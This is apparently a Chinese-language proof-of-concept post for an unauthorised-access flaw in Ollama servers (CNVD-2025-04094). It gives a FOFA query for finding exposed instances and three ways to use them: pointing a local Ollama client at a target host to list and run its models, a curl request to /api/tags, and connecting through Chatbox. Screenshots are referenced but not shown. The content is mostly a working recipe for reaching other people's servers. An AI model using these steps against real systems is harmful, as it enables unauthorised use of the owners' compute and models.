OLLAMA 未授权访问(CNVD-2025-04094)

fofa:

app="Ollama"

poc:

方法一:

本地需要搭建一个ollama服务

powershell设置目标主机地址

$env:OLLAMA_HOST=”ip:port”

图片[1]-OLLAMA 未授权访问(CNVD-2025-04094)-棉花糖会员站

 连接后查询

ollama list

图片[2]-OLLAMA 未授权访问(CNVD-2025-04094)-棉花糖会员站

调用连接地址模型

ollama run deepseek-r1:70b

图片[3]-OLLAMA 未授权访问(CNVD-2025-04094)-棉花糖会员站

 方法二: 

简单粗暴的直接使用curl命令执行

curl your-ip:port/api/tags

图片[4]-OLLAMA 未授权访问(CNVD-2025-04094)-棉花糖会员站

GET /api/tags HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host:

图片[5]-OLLAMA 未授权访问(CNVD-2025-04094)-棉花糖会员站

方法三:

chatbox连接访问 配置访问地址

图片[6]-OLLAMA 未授权访问(CNVD-2025-04094)-棉花糖会员站

选中配置的模型

图片[7]-OLLAMA 未授权访问(CNVD-2025-04094)-棉花糖会员站

© 版权声明
THE END
喜欢就支持一下吧
点赞36赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容